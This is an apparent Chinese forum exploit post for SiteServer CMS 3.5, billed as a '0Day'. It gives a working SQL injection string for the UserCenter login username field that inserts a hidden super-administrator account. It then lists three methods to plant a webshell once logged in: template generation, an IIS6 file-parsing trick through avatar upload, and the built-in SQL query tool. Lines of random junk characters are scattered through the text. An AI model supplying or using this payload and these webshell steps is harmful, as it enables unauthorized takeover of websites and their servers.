SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版
2 ^# e4 x, _1 O6 G: H) a; Q$ \, S
4 h( n& \& g; C( p! j3 J9 h5 istieserver官网:www.siteserver.cn

, A3 q. }/ v! d! `% L, q6 x

EXP:

直接访问UserCenter/login.aspx

( W" E  u; R6 e! S9 r$ F8 k$ @

; K# F+ i& K5 R; A+ a+ _6 S用户名处输入：
9 M0 T& x/ s) s1 e) e' c
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
2 Z2 A# O3 y& g  g$ c

4 r- d* Z" ~! G5 Q  j5 Z$ E( h
密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。

& N4 x' F; p1 W# e& ]; L
0 C7 |0 x' V( {* W3 u/ ^0 ^: i
之后再访问后台SiteServer/login.aspx用插入的用户登陆

4 m  j+ \' k! W4 ]9 Y

后台拿webshell的三种方法：
/ w6 S$ y& x+ y, {5 @$ v$ ?
$ E3 _' B) Y# O6 B一、

+ H4 p% s% w+ O7 z, N站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

二、

成员权限-》添加用户-》用户名为：1.asp
9 g# C) |6 w. `4 ?
. E# K! g3 e9 c3 R5 H& Xhttp://127.0.0.1/usercenter/
4 t5 x' s3 F7 I, v7 Z6 f
用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

& q# {" o8 b( |' n( T（ps：后台添加用户时不会验证是否含有非法字符）
9 x. ~: u& C4 }, a
三、
0 }. d+ f. [( m/ L) Z8 W
系统工具-》实用工具-》机器参数查看
" x7 n% ]1 N2 Y; p* ]2 l* t可以看到数据库类型、名称，WEB路径

系统工具-》数据库工具-》SQL语句查询
这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
) }1 L- c5 T* S  f( l  T" d